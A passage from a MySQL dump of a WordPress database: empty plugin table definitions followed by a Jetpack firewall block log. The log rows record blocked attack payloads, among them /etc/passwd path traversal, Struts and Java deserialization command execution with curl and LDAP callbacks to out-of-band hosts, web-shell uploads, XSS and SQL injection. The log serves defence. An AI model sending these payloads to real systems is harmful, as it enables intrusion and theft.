  `user_agent` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `actions_count` int(11) DEFAULT '0',
  `actions_succeeded_count` int(11) DEFAULT '0',
  `status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `is_read` tinyint(1) NOT NULL DEFAULT '0',
  `meta` text COLLATE utf8mb4_unicode_ci,
  `created_at_gmt` datetime NOT NULL,
  `updated_at_gmt` datetime NOT NULL,
  `created_at` datetime NOT NULL,
  `updated_at` datetime NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `hash_id_unique_index` (`hash_id`),
  KEY `main_meta_id_index` (`main_meta_id`),
  KEY `hash_id_index` (`hash_id`),
  KEY `type_index` (`type`),
  KEY `post_id_index` (`post_id`),
  KEY `element_id_index` (`element_id`),
  KEY `campaign_id_index` (`campaign_id`),
  KEY `user_id_index` (`user_id`),
  KEY `user_ip_index` (`user_ip`),
  KEY `status_index` (`status`),
  KEY `is_read_index` (`is_read`),
  KEY `created_at_gmt_index` (`created_at_gmt`),
  KEY `updated_at_gmt_index` (`updated_at_gmt`),
  KEY `created_at_index` (`created_at`),
  KEY `updated_at_index` (`updated_at`),
  KEY `referer_index` (`referer`(191)),
  KEY `referer_title_index` (`referer_title`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_e_submissions`
--

LOCK TABLES `wp_e_submissions` WRITE;
/*!40000 ALTER TABLE `wp_e_submissions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_e_submissions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_e_submissions_actions_log`
--

DROP TABLE IF EXISTS `wp_e_submissions_actions_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_e_submissions_actions_log` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `submission_id` bigint(20) unsigned NOT NULL,
  `action_name` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL,
  `action_label` varchar(60) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `log` text COLLATE utf8mb4_unicode_ci,
  `created_at_gmt` datetime NOT NULL,
  `updated_at_gmt` datetime NOT NULL,
  `created_at` datetime NOT NULL,
  `updated_at` datetime NOT NULL,
  PRIMARY KEY (`id`),
  KEY `submission_id_index` (`submission_id`),
  KEY `action_name_index` (`action_name`),
  KEY `status_index` (`status`),
  KEY `created_at_gmt_index` (`created_at_gmt`),
  KEY `updated_at_gmt_index` (`updated_at_gmt`),
  KEY `created_at_index` (`created_at`),
  KEY `updated_at_index` (`updated_at`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_e_submissions_actions_log`
--

LOCK TABLES `wp_e_submissions_actions_log` WRITE;
/*!40000 ALTER TABLE `wp_e_submissions_actions_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_e_submissions_actions_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_e_submissions_values`
--

DROP TABLE IF EXISTS `wp_e_submissions_values`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_e_submissions_values` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `submission_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `key` varchar(60) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`id`),
  KEY `submission_id_index` (`submission_id`),
  KEY `key_index` (`key`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_e_submissions_values`
--

LOCK TABLES `wp_e_submissions_values` WRITE;
/*!40000 ALTER TABLE `wp_e_submissions_values` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_e_submissions_values` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_evf_entries`
--

DROP TABLE IF EXISTS `wp_evf_entries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_evf_entries` (
  `entry_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` bigint(20) unsigned NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL,
  `user_device` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
  `user_ip_address` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `referer` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `fields` longtext COLLATE utf8mb4_unicode_ci,
  `status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `viewed` tinyint(1) NOT NULL DEFAULT '0',
  `starred` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`entry_id`),
  KEY `form_id` (`form_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_evf_entries`
--

LOCK TABLES `wp_evf_entries` WRITE;
/*!40000 ALTER TABLE `wp_evf_entries` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_evf_entries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_evf_entrymeta`
--

DROP TABLE IF EXISTS `wp_evf_entrymeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_evf_entrymeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `entry_id` bigint(20) unsigned NOT NULL,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `entry_id` (`entry_id`),
  KEY `meta_key` (`meta_key`(32))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_evf_entrymeta`
--

LOCK TABLES `wp_evf_entrymeta` WRITE;
/*!40000 ALTER TABLE `wp_evf_entrymeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_evf_entrymeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_evf_sessions`
--

DROP TABLE IF EXISTS `wp_evf_sessions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_evf_sessions` (
  `session_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `session_key` char(32) COLLATE utf8mb4_unicode_ci NOT NULL,
  `session_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `session_expiry` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`session_id`),
  UNIQUE KEY `session_key` (`session_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_evf_sessions`
--

LOCK TABLES `wp_evf_sessions` WRITE;
/*!40000 ALTER TABLE `wp_evf_sessions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_evf_sessions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_jet_smart_filters_indexer`
--

DROP TABLE IF EXISTS `wp_jet_smart_filters_indexer`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_jet_smart_filters_indexer` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `filter_key` text COLLATE utf8mb4_unicode_520_ci,
  `filter_posts` longtext COLLATE utf8mb4_unicode_520_ci,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_jet_smart_filters_indexer`
--

LOCK TABLES `wp_jet_smart_filters_indexer` WRITE;
/*!40000 ALTER TABLE `wp_jet_smart_filters_indexer` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_jet_smart_filters_indexer` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_jetpack_waf_blocklog`
--

DROP TABLE IF EXISTS `wp_jetpack_waf_blocklog`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_jetpack_waf_blocklog` (
  `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `timestamp` datetime NOT NULL,
  `rule_id` bigint(20) NOT NULL,
  `reason` longtext COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`log_id`),
  KEY `timestamp` (`timestamp`)
) ENGINE=MyISAM AUTO_INCREMENT=11301 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_jetpack_waf_blocklog`
--

LOCK TABLES `wp_jetpack_waf_blocklog` WRITE;
/*!40000 ALTER TABLE `wp_jetpack_waf_blocklog` DISABLE KEYS */;
INSERT INTO `wp_jetpack_waf_blocklog` VALUES (11201,'2024-10-06 07:51:28',933150,'PHP Injection Attack: High-Risk PHP Function Name Found Matched Data: call_user_func found within args:function: call_user_func_array'),(11202,'2024-10-06 07:51:29',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:lang: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/usr\\/local\\/lib\\/php\\/pearcmd'),(11203,'2024-10-06 07:51:29',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:lang: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/tmp\\/index1'),(11204,'2024-10-06 08:37:00',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:url: http:\\/\\/127.0.0.1\\/file:\\/\\/\\/etc\\/passwd'),(11205,'2024-10-06 22:52:19',911100,'Method is not allowed by policy CONNECT'),(11206,'2024-10-07 22:44:35',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11207,'2024-10-09 01:57:16',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:bsh_script: exec(&amp;quot;cat \\/etc\\/passwd&amp;quot;);'),(11208,'2024-10-09 02:00:06',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:ostype: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/etc\\/passwd'),(11209,'2024-10-09 02:00:07',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:type: &amp;#039;|cat \\/etc\\/passwd||&amp;#039;'),(11210,'2024-10-09 02:00:08',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:fileNames[0]: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/etc\\/passwd'),(11211,'2024-10-09 02:00:08',944130,'Suspicious Java class detected Matched Data: {&amp;quot;ParamName&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;paramDesc&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;paramType&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;sampleItem&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;mandatory&amp;quot;:true,&amp;quot;requiredFlag&amp;quot;:1,&amp;quot;validationRules&amp;quot;:&amp;quot;function verification(data){a = new java.lang.ProcessBuilder(\\\\&amp;quot;id\\\\&amp;quot;).start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss=&amp;#039;&amp;#039;;while((line = r.readLine()) != null){ss+=line};return ss;}&amp;quot;} found within request_body'),(11212,'2024-10-09 02:04:00',944130,'Suspicious Java class detected Matched Data: {&amp;quot;serviceName&amp;quot;:&amp;quot;nc.itf.iufo.IBaseSPService&amp;quot;,&amp;quot;methodName&amp;quot;:&amp;quot;saveXStreamConfig&amp;quot;,&amp;quot;parameterTypes&amp;quot;:[&amp;quot;java.lang.Object&amp;quot;,&amp;quot;java.lang.String&amp;quot;],&amp;quot;parameters&amp;quot;:[&amp;quot;${param.getClass().forName(param.error).newInstance().eval(param.cmd)}&amp;quot;,&amp;quot;webapps\\/nc_web\\/zRTSaOj811DR.jsp&amp;quot;]} found within request_body'),(11213,'2024-10-09 03:18:50',933110,'PHP Injection Attack: PHP Script File Upload Found Matched Data: 2nAcizVOZGENyne7MsUn5ASs6Dc.php found within files:Filedata: 2nAcizVOZGENyne7MsUn5ASs6Dc.php'),(11214,'2024-10-09 03:18:50',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:var: {&amp;quot;body&amp;quot;:{&amp;quot;file&amp;quot;:&amp;quot;file:\\/\\/\\/etc\\/passwd&amp;quot;}}'),(11215,'2024-10-09 04:18:30',930110,'Path Traversal Attack (\\/..\\/) Matched Data: \\/..\\/ found within args:picUrl: .\\/..\\/config\\/database.php'),(11216,'2024-10-09 04:54:23',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:lang: ..\\/..\\/..\\/..\\/..\\/usr\\/local\\/php\\/pearcmd'),(11217,'2024-10-09 04:54:27',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within request_headers:think-lang: ..\\/..\\/..\\/..\\/..\\/usr\\/local\\/php\\/pearcmd'),(11218,'2024-10-09 04:54:30',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:lang: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/usr\\/local\\/lib\\/php\\/pearcmd'),(11219,'2024-10-09 05:58:59',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11220,'2024-10-09 05:59:45',933150,'PHP Injection Attack: High-Risk PHP Function Name Found Matched Data: call_user_func found within args:function: call_user_func_array'),(11221,'2024-10-09 05:59:46',933150,'PHP Injection Attack: High-Risk PHP Function Name Found Matched Data: call_user_func found within args:function: call_user_func_array'),(11222,'2024-10-09 05:59:47',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:lang: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/usr\\/local\\/lib\\/php\\/pearcmd'),(11223,'2024-10-09 05:59:48',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:lang: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/tmp\\/index1'),(11224,'2024-10-09 13:41:10',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:password: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{&amp;quot;cat&amp;quot;,&amp;quot;\\/etc\\/passwd&amp;quot;})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(&amp;quot;com.opensymphony.xwork2.dispatcher.HttpServletResponse&amp;quot;),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\r\\n'),(11225,'2024-10-09 13:57:25',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:configuration: O:10:&amp;quot;PMA_Config&amp;quot;:1:{s:6:&amp;quot;source&amp;quot;,s:11:&amp;quot;\\/etc\\/passwd&amp;quot;;}'),(11226,'2024-10-09 13:57:25',920270,'Invalid character in request (null character) args:sl=..\\/..\\/..\\/..\\/..\\/..\\/..\\/etc\\/passwd\0'),(11227,'2024-10-09 13:57:27',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: -d_allow_url_include=on_-d_auto_prepend_file=php:\\/\\/input'),(11228,'2024-10-09 15:07:02',941110,'XSS Filter - Category 1: Script Tag Vector Matched Data: &amp;lt;script&amp;gt; found within args:page: &amp;lt;\\/script&amp;gt;&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;\\/script&amp;gt;'),(11229,'2024-10-09 20:40:46',933150,'PHP Injection Attack: High-Risk PHP Function Name Found Matched Data: call_user_func found within args:filter[0]: call_user_func'),(11230,'2024-10-10 00:06:13',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{&amp;quot;cat&amp;quot;, &amp;quot;\\/etc\\/passwd&amp;quot;})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(&amp;quot;com.opensymphony.xwork2.dispatcher.HttpServletResponse&amp;quot;),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\r\\n'),(11231,'2024-10-10 01:22:56',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:loc: ..\\/WEB-INF'),(11232,'2024-10-10 01:22:56',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:loc: ..\\/WEB-INF'),(11233,'2024-10-10 01:22:56',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:loc: ..\\/WEB-INF'),(11234,'2024-10-10 01:22:57',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:loc: ..\\/WEB-INF'),(11235,'2024-10-10 01:22:57',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:loc: ..\\/WEB-INF'),(11236,'2024-10-10 06:46:27',941110,'XSS Filter - Category 1: Script Tag Vector Matched Data: &amp;lt;script&amp;gt; found within args:page: &amp;lt;script&amp;gt;alert(document.domain)&amp;lt;\\/script&amp;gt;'),(11237,'2024-10-10 08:30:54',944130,'Suspicious Java class detected Matched Data: &amp;lt;sorted-set&amp;gt;\\r\\n    &amp;lt;string&amp;gt;foo&amp;lt;\\/string&amp;gt;\\r\\n    &amp;lt;contact class=&amp;#039;dynamic-proxy&amp;#039;&amp;gt;\\r\\n      &amp;lt;interface&amp;gt;java.lang.Comparable&amp;lt;\\/interface&amp;gt;\\r\\n      &amp;lt;handler class=&amp;#039;java.beans.EventHandler&amp;#039;&amp;gt;\\r\\n          &amp;lt;target class=&amp;#039;java.lang.ProcessBuilder&amp;#039;&amp;gt;\\r\\n              &amp;lt;command&amp;gt;\\r\\n                &amp;lt;string&amp;gt;curl&amp;lt;\\/string&amp;gt;\\r\\n                &amp;lt;string&amp;gt;http:\\/\\/cs2skblobuvb6elmr44ghwjd1qku1a79k.oast.online&amp;lt;\\/string&amp;gt;\\r\\n              &amp;lt;\\/command&amp;gt;\\r\\n          &amp;lt;\\/target&amp;gt;\\r\\n          &amp;lt;action&amp;gt;start&amp;lt;\\/action&amp;gt;\\r\\n      &amp;lt;\\/handler&amp;gt;\\r\\n  &amp;lt;\\/contact&amp;gt;\\r\\n&amp;lt;\\/sorted-set&amp;gt; found within request_body'),(11238,'2024-10-10 09:31:49',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:type: &amp;#039;|cat \\/etc\\/passwd||&amp;#039;'),(11239,'2024-10-10 13:52:58',921150,'HTTP Header Injection Attack via payload (CR\\/LF detected) Matched Data: \\r found within args_names:1: {\\r\\n____&amp;quot;size&amp;quot;:_1,\\r\\n____&amp;quot;query&amp;quot;:_{\\r\\n______&amp;quot;filtered&amp;quot;:_{\\r\\n________&amp;quot;query&amp;quot;:_{\\r\\n__________&amp;quot;match_all&amp;quot;:_{\\r\\n__________}\\r\\n________}\\r\\n______}\\r\\n____},\\r\\n____&amp;quot;script_fields&amp;quot;:_{\\r\\n________&amp;quot;command&amp;quot;:_{\\r\\n____________&amp;quot;script&amp;quot;:_&amp;quot;import_java_io_*;new_java_util_Scanner(Runtime_getRuntime()_exec(\\\\&amp;quot;cat_\\/etc\\/passwd\\\\&amp;quot;)_getInputStream())_useDelimiter(\\\\&amp;quot;\\\\\\\\\\\\\\\\A\\\\&amp;quot;)_next();&amp;quot;\\r\\n________}\\r\\n____}\\r\\n}'),(11240,'2024-10-10 13:59:19',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:input_file: php:\\/\\/filter\\/resource=\\/etc\\/passwd'),(11241,'2024-10-10 13:59:19',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:input_file: php:\\/\\/filter\\/resource=\\/etc\\/passwd'),(11242,'2024-10-10 13:59:19',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:input_file: php:\\/\\/filter\\/resource=\\/etc\\/passwd'),(11243,'2024-10-10 13:59:19',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:input_file: php:\\/\\/filter\\/resource=\\/etc\\/passwd'),(11244,'2024-10-10 13:59:19',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:input_file: php:\\/\\/filter\\/resource=\\/etc\\/passwd'),(11245,'2024-10-10 13:59:20',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:input_file: php:\\/\\/filter\\/resource=\\/etc\\/passwd'),(11246,'2024-10-10 13:59:20',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:input_file: php:\\/\\/filter\\/resource=\\/etc\\/passwd'),(11247,'2024-10-10 13:59:20',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:input_file: php:\\/\\/filter\\/resource=\\/etc\\/passwd'),(11248,'2024-10-10 13:59:20',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:input_file: php:\\/\\/filter\\/resource=\\/etc\\/passwd'),(11249,'2024-10-10 13:59:20',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:input_file: php:\\/\\/filter\\/resource=\\/etc\\/passwd'),(11250,'2024-10-10 13:59:20',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:input_file: php:\\/\\/filter\\/resource=\\/etc\\/passwd'),(11251,'2024-10-10 20:39:58',942160,'Detects blind sqli tests using sleep() or benchmark() Matched Data: SLEEP(7) found within args:code: a&amp;#039; OR (SELECT 1 FROM (SELECT(SLEEP(7)))a)-- -'),(11252,'2024-10-10 22:27:36',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11253,'2024-10-10 22:28:16',933150,'PHP Injection Attack: High-Risk PHP Function Name Found Matched Data: call_user_func found within args:function: call_user_func_array'),(11254,'2024-10-10 22:28:17',933150,'PHP Injection Attack: High-Risk PHP Function Name Found Matched Data: call_user_func found within args:function: call_user_func_array'),(11255,'2024-10-10 22:28:18',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:lang: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/usr\\/local\\/lib\\/php\\/pearcmd'),(11256,'2024-10-10 22:28:19',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:lang: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/tmp\\/index1'),(11257,'2024-10-11 04:07:08',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11258,'2024-10-11 04:08:19',933150,'PHP Injection Attack: High-Risk PHP Function Name Found Matched Data: call_user_func found within args:function: call_user_func_array'),(11259,'2024-10-11 04:08:21',933150,'PHP Injection Attack: High-Risk PHP Function Name Found Matched Data: call_user_func found within args:function: call_user_func_array'),(11260,'2024-10-11 04:08:23',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:lang: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/usr\\/local\\/lib\\/php\\/pearcmd'),(11261,'2024-10-11 04:08:24',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:lang: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/tmp\\/index1'),(11262,'2024-10-11 08:30:58',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11263,'2024-10-11 08:30:59',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11264,'2024-10-11 08:31:02',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11265,'2024-10-11 08:31:04',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11266,'2024-10-11 08:31:04',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11267,'2024-10-11 08:31:06',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11268,'2024-10-11 22:51:05',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:c: cat \\/etc\\/passwd'),(11269,'2024-10-11 22:51:06',944130,'Suspicious Java class detected Matched Data: {&amp;quot;ftpUrl&amp;quot;:{&amp;quot;e&amp;quot;:{&amp;quot;@type&amp;quot;:&amp;quot;java.lang.Class&amp;quot;,&amp;quot;val&amp;quot;:&amp;quot;com.sun.rowset.JdbcRowSetImpl&amp;quot;},&amp;quot;f&amp;quot;:{&amp;quot;@type&amp;quot;:&amp;quot;com.sun.rowset.JdbcRowSetImpl&amp;quot;,&amp;quot;dataSourceName&amp;quot;:&amp;quot;ldap:\\/\\/cs4bccsg8c3juu3klasg4tqe315qd5ojx.oast.site&amp;quot;,&amp;quot;autoCommit&amp;quot;:true}}} found within request_body'),(11270,'2024-10-11 22:51:12',933110,'PHP Injection Attack: PHP Script File Upload Found Matched Data: 2nHFMthoiAo2lCy90kZoMbvPHT0.php found within files:file: 2nHFMthoiAo2lCy90kZoMbvPHT0.php'),(11271,'2024-10-11 22:51:15',933110,'PHP Injection Attack: PHP Script File Upload Found Matched Data: 2nHFMtZwoyr0glO4TSEoCTbQxMR.php found within files:file: 2nHFMtZwoyr0glO4TSEoCTbQxMR.php'),(11272,'2024-10-11 23:18:30',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11273,'2024-10-11 23:19:24',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:shrt_param[design]: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/usr\\/local\\/lib\\/php\\/pearcmd'),(11274,'2024-10-11 23:19:27',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:shrt_param[design]: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/tmp\\/2nHFMwxZMYQnw0wkadZHmOFcL5y'),(11275,'2024-10-12 05:32:49',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:type: &amp;#039;|cat \\/etc\\/passwd||&amp;#039;'),(11276,'2024-10-12 05:32:50',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:bsh_script: exec(&amp;quot;cat \\/etc\\/passwd&amp;quot;);'),(11277,'2024-10-12 06:29:42',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11278,'2024-10-12 06:30:32',933150,'PHP Injection Attack: High-Risk PHP Function Name Found Matched Data: call_user_func found within args:function: call_user_func_array'),(11279,'2024-10-12 06:30:33',933150,'PHP Injection Attack: High-Risk PHP Function Name Found Matched Data: call_user_func found within args:function: call_user_func_array'),(11280,'2024-10-12 06:30:34',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:lang: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/usr\\/local\\/lib\\/php\\/pearcmd'),(11281,'2024-10-12 06:30:35',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:lang: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/tmp\\/index1'),(11282,'2024-10-12 06:50:27',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:ostype: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/etc\\/passwd'),(11283,'2024-10-12 06:50:28',944130,'Suspicious Java class detected Matched Data: {&amp;quot;serviceName&amp;quot;:&amp;quot;nc.itf.iufo.IBaseSPService&amp;quot;,&amp;quot;methodName&amp;quot;:&amp;quot;saveXStreamConfig&amp;quot;,&amp;quot;parameterTypes&amp;quot;:[&amp;quot;java.lang.Object&amp;quot;,&amp;quot;java.lang.String&amp;quot;],&amp;quot;parameters&amp;quot;:[&amp;quot;${param.getClass().forName(param.error).newInstance().eval(param.cmd)}&amp;quot;,&amp;quot;webapps\\/nc_web\\/kYqqEjwyjHiR.jsp&amp;quot;]} found within request_body'),(11284,'2024-10-12 06:50:30',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:fileNames[0]: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/etc\\/passwd'),(11285,'2024-10-12 06:50:30',944130,'Suspicious Java class detected Matched Data: 